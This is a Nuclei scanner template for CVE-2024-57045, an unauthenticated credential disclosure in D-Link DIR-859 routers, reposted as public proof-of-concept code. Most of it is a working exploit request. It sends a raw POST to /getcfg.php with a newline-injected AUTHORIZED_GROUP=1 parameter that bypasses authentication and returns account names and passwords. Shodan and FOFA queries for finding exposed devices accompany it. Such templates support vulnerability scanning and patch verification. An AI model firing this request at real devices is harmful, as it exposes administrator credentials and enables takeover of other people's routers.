A critical information disclosure vulnerability exists in D-Link devices where sensitive device account information including credentials can be retrieved by sending an unauthenticated request to `/getcfg.php` endpoint with the parameter `SERVICES=DEVICE.ACCOUNT`. This could allow attackers to obtain administrative credentials and gain full control of the affected device.
PoC代码[已公开]
id: CVE-2024-57045
info:
name: D-Link DIR-859 - Information Disclosure
author: ritikchaddha
severity: critical
description: |
A critical information disclosure vulnerability exists in D-Link devices where sensitive device account information including credentials can be retrieved by sending an unauthenticated request to `/getcfg.php` endpoint with the parameter `SERVICES=DEVICE.ACCOUNT`. This could allow attackers to obtain administrative credentials and gain full control of the affected device.
reference:
- https://www.dlink.com/en/security-bulletin
- https://nvd.nist.gov/vuln/detail/CVE-2024-57045
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-57045
cwe-id: CWE-200
epss-score: 0.38942
epss-percentile: 0.97177
metadata:
max-request: 1
verified: true
shodan-query: title:"D-Link"
fofa-query: title="D-Link"
vendor: D-Link
tags: cve,cve2024,dlink,disclosure,unauth
http:
- raw:
- |
POST /getcfg.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<name>"
- "<password>"
- "<account>"
condition: and
- type: word
part: content_type
words:
- "text/xml"
- type: status
status:
- 200
# digest: 4a0a00473045022100aa9107e1367e9fd86298fb7edbbfc47b3eda3de693feafdc2b750b49089ab1ca022021a9252174c96b6bef60b6dc480090a3d978c144c96bbb565e6f7dcd04a2f079:922c64590222798bb761d5b6d8e72950